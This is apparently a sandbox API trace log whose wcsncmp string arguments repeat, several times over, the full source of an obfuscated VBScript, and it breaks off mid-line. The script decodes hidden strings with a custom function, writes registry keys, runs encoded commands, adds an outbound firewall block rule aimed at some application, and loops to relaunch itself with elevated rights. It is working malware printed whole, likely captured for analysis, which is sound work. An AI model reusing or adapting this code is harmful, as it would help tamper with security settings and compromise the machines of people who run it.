bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.919] wcsncmp (_String1="ror Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.919] wcsncmp (_String1="or Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.919] wcsncmp (_String1="r Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.920] wcsncmp (_String1=" Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 